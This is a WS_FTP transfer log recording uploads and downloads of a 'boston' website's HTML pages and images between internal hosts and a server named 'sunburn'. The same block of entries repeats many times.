10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
